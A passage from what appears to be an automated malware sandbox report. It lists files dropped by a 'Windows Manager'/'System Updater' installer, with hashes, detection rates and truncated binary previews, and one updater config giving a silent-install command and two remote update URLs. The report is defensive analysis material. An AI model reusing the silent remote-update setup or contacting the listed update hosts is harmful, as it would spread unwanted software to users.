                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._..._..._...K...U...K.......3...{...3...O...3...J...K...L...K...X..._.................^......^..._.v.^......^...Rich_...........................PE..L...z.\`.........."!.....X...................p............................................@.................................|...<....p.. ...............................p........................... ...@............p..t............................text....V.......X.................. ..`.rdata......p.......\..............@..@.data...dV..........................@....rsrc... ....p......................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1502656
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                        MD5:78C547B9587D497C80C35AAF2145E562
                                                                                                                                                                                                                                                                        SHA1:004DC5093FEC82325DFACA46B017FA822474BDA4
                                                                                                                                                                                                                                                                        SHA-256:56310567129504E8151CD2EFE9F19D05EA475BA603FF3516FB98C976DFDF6DA9
                                                                                                                                                                                                                                                                        SHA-512:DAF5FA22129522E745F3C32CEA22653D33DD4826215C6E7EEAC63C9F8D824A7C264F5BE6589BFD9CB6015CD3337BF0B63FF789735AA1B4F86F911FCB2874F639
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):205673
                                                                                                                                                                                                                                                                        Entropy (8bit):6.456533545782146
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:rj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPDe:H+FQ38t/SZfkVfISkC7R7Z1uriK
                                                                                                                                                                                                                                                                        MD5:4D53E953811E312B9EC6D26B85AD4A0A
                                                                                                                                                                                                                                                                        SHA1:EFF9BC4B0BEE760E290B2EBA32B09CEFD7369E1A
                                                                                                                                                                                                                                                                        SHA-256:FB34E454914727E57E423E11A4B01BAA7CB754EF0BE108845C5E072E7628FB52
                                                                                                                                                                                                                                                                        SHA-512:E8BA42D9BF72E135D33F382D688C8A5673CD37F6C2719F9CFF04BADCAA744A8F136FA78B41DBCA41F52BA4B6E03C41F65E13EC9693E391CBB1660C119B9E80C0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@4t.W.@.....@.....@.....@.....@.....@......&.{C845414C-903C-4218-9DE7-132AB97FDF62}..Windows Manager$.Windows Manager - Postback Johan.msi.@.....@.....@.....@......logo.exe..&.{C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Manager......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{28FDA578-EFA5-4A4F-A558-E4219B09577D}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{D30ED18A-DEA4-45D6-8A1F-1643C3CC79C1}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{C48C1022-6EC4-4C0F-BB98-0EA64D330920}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{FD7030D8-9E76-4445-B52A-726084B486D7}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{BDF67205-71EF-48E8-B35B-F43B4B2037ED}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{57BA717A-E6F6-4504-AC96-B25193D3B96E}&.{C845414C-903C-4218-9DE7-132AB97FDF62}.@......&.{57BA717A-E6F6-4504-AC9
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1278735
                                                                                                                                                                                                                                                                        Entropy (8bit):6.43768081152859
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:2REYB+FAREYB+F3REYB+FpREYB+FGREYB+FQREYB+F5REYB+Fk:2REYgAREYg3REYgpREYgGREYgQREYg5X
                                                                                                                                                                                                                                                                        MD5:ABB2E1D76D4A263B1EFB11B59BFC628E
                                                                                                                                                                                                                                                                        SHA1:495F438C3051B34E4AD3CEA3959EB7FA97D3F482
                                                                                                                                                                                                                                                                        SHA-256:0C77110749B8F81A853649693E4000743DD409C76A79DE4C07613E7F68E6C23F
                                                                                                                                                                                                                                                                        SHA-512:87CD7BC4DB9BB3AEDFCBB8FA3E592352515BAC451E128B5F44CCAF70AD9A64E0A8CD4FE7059D9BFF511191E199B922C20D2F23F62EA24B9671E971C4EBE1F1B1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@@t.W.@.....@.....@.....@.....@.....@......&.{13499434-9821-4E2D-B7DF-7C0867EB1504}..Windows Installer..System Updater.msi.@.....@.....@.....@......logo.exe..&.{F5D6D741-5AB0-4858-81E2-26A50610DFFA}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{DECF3B3F-BFBA-4EB7-8878-E4C409356ABA}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@......&.{71730F5F-0233-4DB3-A1F2-B0AD0A1B831F}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@......&.{408CE191-A5E9-46B9-ADB0-4347C8FF9F0C}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@......&.{58381363-55CC-4691-9CA4-9F7C23C7CB30}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@......&.{C2120CD2-0128-4AF5-A142-B9275A4695E6}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@......&.{845529B4-88B3-40D2-9BAD-9BB05F467355}&.{13499434-9821-4E2D-B7DF-7C0867EB1504}.@........AI_RollbackTasks21.Rolling back sched
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12885
                                                                                                                                                                                                                                                                        Entropy (8bit):5.582776368455914
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:KLDdSvROW+vRNWJv6ZvhOf7UrE2peOoSBx63tJd:KLDdSROzRNOv6ZozqE2peOoSBitJd
                                                                                                                                                                                                                                                                        MD5:9EF0CF9D62B8D3C7CDAF512391DBD9BD
                                                                                                                                                                                                                                                                        SHA1:7C3B8C500DE1DFF5121C453EA67FA9636D6DF010
                                                                                                                                                                                                                                                                        SHA-256:B16E26882E5171931F3BD28188B4B7C9CC00499D3B3B89572CCD6931E10EDE7D
                                                                                                                                                                                                                                                                        SHA-512:4F46A3065E58BCE37B3ECF56323D8C0D56ED24A1981456464379F446D61C29B02A1660887442E5D48F7E926261CBF27912040ECF3218E292D55144CDB22EFA07
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@Ct.W.@.....@.....@.....@.....@.....@......&.{C845414C-903C-4218-9DE7-132AB97FDF62}..Windows Manager$.Windows Manager - Postback Johan.msi.@.....@.....@.....@......logo.exe..&.{C5EBDD8B-C384-4CB5-9A33-9A4EF2189D51}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Manager......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\C414548CC3098124D97E31A29BF7FD26\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\680af5.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\C414548CC3098124D97E31A29BF7FD26\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...CommentsX.This installer data
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:10:02 2019, mtime=Wed Dec 6 12:33:54 2023, atime=Sat Dec 7 08:10:02 2019, length=59904, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1871
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6155237488873753
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:8YJWeSkbTAkwm+ssv0r+MQv0srSOIP4WQv0sJcsFSEEyfm:8YYAb02eI5KPrSOIwWKPWsYEX
                                                                                                                                                                                                                                                                        MD5:DCB791644464751A53868A2A25A487AC
                                                                                                                                                                                                                                                                        SHA1:13B02398612482536F229B977FBC3618B7D76322
                                                                                                                                                                                                                                                                        SHA-256:02FCA12F22C19E42F68F63885B75AE2B0FE054848FE9D0C8C4298EC79933D980
                                                                                                                                                                                                                                                                        SHA-512:4E11F6F4B91A1B1FFD47346A2556611EB454DA51C4FE87118F06F94B36F64E5CEEA1722352B3AC800D9ABE9B76110DA1B5F2D2BE6C6443F64FC6F7C9E7A01487
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.`.. ...25.........H(..25.............................A....P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwH.W.l....3.........................W.i.n.d.o.w.s.....Z.1.....DW.r..SysWOW64..B......O.I.W.l....Y.....................l...S.y.s.W.O.W.6.4.....b.2......OBI .msiexec.exe.H......OBI.W4l................|.............m.s.i.e.x.e.c...e.x.e.......N...............-.......M...........R..d.....C:\Windows\SysWOW64\msiexec.exe..%.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e.)./.x. .{.1.3.4.9.9.4.3.4.-.9.8.2.1.-.4.E.2.D.-.B.7.D.F.-.7.C.0.8.6.7.E.B.1.5.0.4.}.S.C.:.\.W.i.n.d.o.w.s.\.I.n.s.t.a.l.l.e.r.\.{.1.3.4.9.9.4.3.4.-.9.8.2.1.-.4.E.2.D.-.B.7.D.F.-.7.C.0.8.6.7.E.B.1.5.0.4.}.\.S.y.s.t.e.m.F.o.l.d.e.r.m.s.i.e.x.e.c...e.x.e.........%SystemRoot%\Installer\{13499434-9821-4E2D-B7DF-7C0867EB1504}\SystemFoldermsiexec.exe......................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12030
                                                                                                                                                                                                                                                                        Entropy (8bit):5.596171849087587
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:/GXK7Rtth7RdtoHMfkpdm8do5c3lE3XEQCfO3tJm:/GXGRt3RdCHMfh8y5+kEQCotJm
                                                                                                                                                                                                                                                                        MD5:6BAF1752725AA0D43D48413C0EF2BE75
                                                                                                                                                                                                                                                                        SHA1:6973A5439714FBD578E8D3C860DF9FD04BAB05E7
                                                                                                                                                                                                                                                                        SHA-256:2E09CA4BF64EB9827D415699900D93543C3DF0BD91947414B6D59BA2AC119ECC
                                                                                                                                                                                                                                                                        SHA-512:E6F9A20EE9C4F2CCF464D51039B6E2D47572A30D30B6220C9D58BA06E3D81C3D8EE4ABA39C4E527A1AD0B837588ADE7B44545484B5AF47F1C37EA4C93366AD81
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@Lt.W.@.....@.....@.....@.....@.....@......&.{13499434-9821-4E2D-B7DF-7C0867EB1504}..Windows Installer..System Updater.msi.@.....@.....@.....@......logo.exe..&.{F5D6D741-5AB0-4858-81E2-26A50610DFFA}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\434994311289D2E47BFDC78076BE5140\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\680afb.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\434994311289D2E47BFDC78076BE5140\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...CommentsZ.This installer database contains
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1954192
                                                                                                                                                                                                                                                                        Entropy (8bit):6.42335894414855
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:IRhZ2ioRhZ2iCRhZ2ifRhZ2itRhZ2i1RhZ2i5RhZ2iKRhZ2ibRhZ2iqRhZ2iA:IuA5fLf0Vkq
                                                                                                                                                                                                                                                                        MD5:AE150309F2E43A4E8CC1AE0B524DACB6
                                                                                                                                                                                                                                                                        SHA1:9C861E3CB7A6259161F448996DE3A2AC3FE0E627
                                                                                                                                                                                                                                                                        SHA-256:CAC3BE012EB70BFDFD69B30EF36AA4413FECA3972F89F6AD87F7195E3DF6F3CB
                                                                                                                                                                                                                                                                        SHA-512:12D968FF308AEC47062747A40F6BA06D842C7DA5A8AEFDA2DD192DB41BE6C0DD457C98C6073843D148540C95E0EF91E36CC36043CF9AA2DB1998894C0CEAA5B8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@Mt.W.@.....@.....@.....@.....@.....@......&.{798E61D4-8923-4E77-A74B-2DF264394A48}..Windows Installer..System Updater.msi.@.....@.....@.....@......logo.exe..&.{BF7EE51F-4DE9-4BDC-9A63-5AFDBF8C954B}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{DECF3B3F-BFBA-4EB7-8878-E4C409356ABA}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@......&.{71730F5F-0233-4DB3-A1F2-B0AD0A1B831F}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@......&.{408CE191-A5E9-46B9-ADB0-4347C8FF9F0C}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@......&.{58381363-55CC-4691-9CA4-9F7C23C7CB30}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@......&.{C2120CD2-0128-4AF5-A142-B9275A4695E6}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@......&.{845529B4-88B3-40D2-9BAD-9BB05F467355}&.{798E61D4-8923-4E77-A74B-2DF264394A48}.@........AI_RollbackTasks21.Rolling back sched
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):697208
                                                                                                                                                                                                                                                                        Entropy (8bit):5.080864864433559
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:FyuvpsDlaR8FXIa9p6RrL1lUHBxnt5mHjLVUQNC:k8psDlaRAXIsYNL1lAd5mHjqQNC
                                                                                                                                                                                                                                                                        MD5:26002A612B392A4A948098A6211E1431
                                                                                                                                                                                                                                                                        SHA1:F22F7BE798FA1F5DAB112E822853A9236FB80ABD
                                                                                                                                                                                                                                                                        SHA-256:DD226AA0EE4D6A3439BF2CF3E9ECD2C22AD59451C8CE902258B1D34FD28FF922
                                                                                                                                                                                                                                                                        SHA-512:BC8A06AE19A1B59C0C89F33943FC449CD8DE1F45133DFC796570BD0407E8E2DD9DAB2885EBE6692F3A06ACF7BCC75AFBEB2E8918E925D37E65C6813EE34A7462
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...*.zb...............%.......................@....................................j.....`... ..................................................2......................x....................................Y..(...................<................................text...............................`..`.data...............................@....rdata...v.......x..................@..@.pdata...............f..............@..@.xdata..............................@..@.bss.... ................................idata...2.......4..................@....CRT....p...........................@....tls................................@....rsrc...............................@....reloc..............................@..B........................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                                                        Entropy (8bit):3.621928094887362
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:HRAbABGQf:HRYFA
                                                                                                                                                                                                                                                                        MD5:F14A9F1417503C7DC1DD6759DE850312
                                                                                                                                                                                                                                                                        SHA1:2647C9CFE611B033824C3998B9E17A69EB7A8D65
                                                                                                                                                                                                                                                                        SHA-256:8C05D3FB956DAC02702A9377D361116E2AD6B2F079E36ADA56DF98D240CC3D96
                                                                                                                                                                                                                                                                        SHA-512:677FBE17BD9B318A69AED59AF3B81A340CDDDBE430E34F7D15B02F279118BE65A2C7B7B30618BD8D0331DE60D7F15DE0E0864C3ED7FB90EEF6EEAC3187D9C3C1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[InternetShortcut]..
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                                                        Entropy (8bit):3.621928094887362
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:HRAbABGQf:HRYFA
                                                                                                                                                                                                                                                                        MD5:F14A9F1417503C7DC1DD6759DE850312
                                                                                                                                                                                                                                                                        SHA1:2647C9CFE611B033824C3998B9E17A69EB7A8D65
                                                                                                                                                                                                                                                                        SHA-256:8C05D3FB956DAC02702A9377D361116E2AD6B2F079E36ADA56DF98D240CC3D96
                                                                                                                                                                                                                                                                        SHA-512:677FBE17BD9B318A69AED59AF3B81A340CDDDBE430E34F7D15B02F279118BE65A2C7B7B30618BD8D0331DE60D7F15DE0E0864C3ED7FB90EEF6EEAC3187D9C3C1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[InternetShortcut]..
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:10:02 2019, mtime=Wed Dec 6 12:34:13 2023, atime=Sat Dec 7 08:10:02 2019, length=59904, window=hide
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1871
                                                                                                                                                                                                                                                                        Entropy (8bit):3.6062493002954255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:8WkrJWeSkbTAkwm+sP4AQ+Mb4A7SIr4Wb4A5csFSEEyfm:8WWYAb02AAQ5b4A7SBWb4AGsYEX
                                                                                                                                                                                                                                                                        MD5:D12B5B6C510C88C5C0BFC85A1909B02A
                                                                                                                                                                                                                                                                        SHA1:49B2702CC9909957DA8BA6180EB8D3984A9CFCAA
                                                                                                                                                                                                                                                                        SHA-256:C99BCF2E039407C41DF8C193AB15106C5D04BE455F00B0C542EE7AE7FC3926C6
                                                                                                                                                                                                                                                                        SHA-512:02F0E3AFB81B5587EE3F793573B194A9E7C274E259B3FF20ED60E2952C5F88EB03F4A30752995959FE1EE496AF47EE8E77752DEBDDFBF20BCE1A7E98358B1EB8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. ...25.....-!..H(..25.............................A....P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwH.W.l....3.........................W.i.n.d.o.w.s.....Z.1.....DW.r..SysWOW64..B......O.I.W.l....Y.....................l...S.y.s.W.O.W.6.4.....b.2......OBI .msiexec.exe.H......OBI.W4l................|.............m.s.i.e.x.e.c...e.x.e.......N...............-.......M...........R..d.....C:\Windows\SysWOW64\msiexec.exe..%.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e.)./.x. .{.7.9.8.E.6.1.D.4.-.8.9.2.3.-.4.E.7.7.-.A.7.4.B.-.2.D.F.2.6.4.3.9.4.A.4.8.}.S.C.:.\.W.i.n.d.o.w.s.\.I.n.s.t.a.l.l.e.r.\.{.7.9.8.E.6.1.D.4.-.8.9.2.3.-.4.E.7.7.-.A.7.4.B.-.2.D.F.2.6.4.3.9.4.A.4.8.}.\.S.y.s.t.e.m.F.o.l.d.e.r.m.s.i.e.x.e.c...e.x.e.........%SystemRoot%\Installer\{798E61D4-8923-4E77-A74B-2DF264394A48}\SystemFoldermsiexec.exe......................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1036152
                                                                                                                                                                                                                                                                        Entropy (8bit):6.491502495873816
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:yViYocX3hU49N1frFMDtpen0qZQ9b1zCdUVdjKFoeO:8iYoM6EODtA0qZhdUVdjKFoeO
                                                                                                                                                                                                                                                                        MD5:00DF35EDF6E7E2345949AF6ACB6EC40A
                                                                                                                                                                                                                                                                        SHA1:C9DCD62666C9056DAE38CB292361ABC263C62ECF
                                                                                                                                                                                                                                                                        SHA-256:C7EE9A8357EEB602C67C4EDEDB3E96510352FDDA9BFDCE60C5902D4C0A57AF66
                                                                                                                                                                                                                                                                        SHA-512:53334A2C60A4CF95EE0D59E86F14DB5847C130A7A27E6E8C418AE6CEF21AF6CD463DA2F15CA1ADC26FAD6A236F0DD92D0BA5ABCD88A453BF02939C8C7C0E7E09
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..7(.{d(.{d(.{d..xe&.{d..~e..{dJ..e;.{dJ.xe1.{dJ.~eu.{d...e3.{d..}e).{d..ze..{d(.zd..{d..reU.{d...d).{d..ye).{dRich(.{d........PE..L.....gb.........."..............................@.................................._....@.....................................,.......pc..............x....`.......:..p...................@;..........@...............t...<........................text...o........................... ..`.rdata..2...........................@..@.data...D)..........................@....rsrc...pc.......d..................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):472
                                                                                                                                                                                                                                                                        Entropy (8bit):5.380424270988325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1OSMctb7qyMp7dwbUvngXnig70XvtgzXWZWVyMfgX4m+pC:1E4+PRPSni5XqfS4m+pC
                                                                                                                                                                                                                                                                        MD5:30E74E45812BACBF0D7B0A9AA7881CD4
                                                                                                                                                                                                                                                                        SHA1:5662713E0363CDE26E0442564964099C703DE1C6
                                                                                                                                                                                                                                                                        SHA-256:1650CD49F6012B34D6CCC6171A197C77694C1DFA8E3780EA08536248EC5880E9
                                                                                                                                                                                                                                                                        SHA-512:9475E19D006B45C056500EF54F67E933E1AA6F9701D736F96B8B72B98F18ABFFA5825DA21DAA13E20FCEB99FC18E2C1B4B0ABC15516624AC067E502A625C6FDD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[General]..Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI..AppDir=C:\Program Files (x86)\AW Manager\Windows Manager\..ID={FDBC5875-BBA4-4DA5-9048-A196A21FE49A}..ApplicationName=Windows Installer..CompanyName=AdvancedWindowsManager..ApplicationVersion=5.0.4..DefaultCommandLine=/silentall..DownloadsFolder=C:\ProgramData\AdvancedWindowsManager\Windows Installer\updates\..URL=https://www.marvellover.com/updates.txt..URL1=https://www.hulkisbulish.com/updates.txt..
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3223613
                                                                                                                                                                                                                                                                        Entropy (8bit):6.3121812985566335
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:OWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TYZ:CtLutqgwh4NYxtJpkxhGj333TQ
                                                                                                                                                                                                                                                                        MD5:12DD9097E595FB41106F5DE6FDC5F049
                                                                                                                                                                                                                                                                        SHA1:73F2078A8461B4DD719476B1B073822201566DA5
                                                                                                                                                                                                                                                                        SHA-256:D220A894986AA4222EEEB61B186EB0DFD971DD06A6145BCECE0892665C4911D3
                                                                                                                                                                                                                                                                        SHA-512:F10224731623DF661147A010097E57378047D5E4D0A2632B17EF326C8695D029DEAC952B61674F67BA3F8C472AF8280A3BED3416C853A07FE3EA4488B65EB714
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9...................................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):434176
                                                                                                                                                                                                                                                                        Entropy (8bit):6.54894127969691
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:wSCzXYwG58z1pqSzBDMnkll8EpUWybLTmxZ2JBQxzSNd1hoi599snmJDr35:PC0wKkqQxz2X5UmJf3
                                                                                                                                                                                                                                                                        MD5:1ED52122E7D26AB6D0845D4008CF1685
                                                                                                                                                                                                                                                                        SHA1:6C856CC941EB63CA908F51109B3ABC1108C4C1E7
                                                                                                                                                                                                                                                                        SHA-256:446B0A0D26068692D8088A50AEBBAAB429514FA630D10F62E9A0EBF6B3E3BC63
                                                                                                                                                                                                                                                                        SHA-512:B0DDD3826F3A6ECCC9610E500A02C9ADEA7AE8C0343F48CDE6AAADEF814681FD39D06D663D6FCC90ED460CA544D8F62D5983421C152420D8398405B9208F6601
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
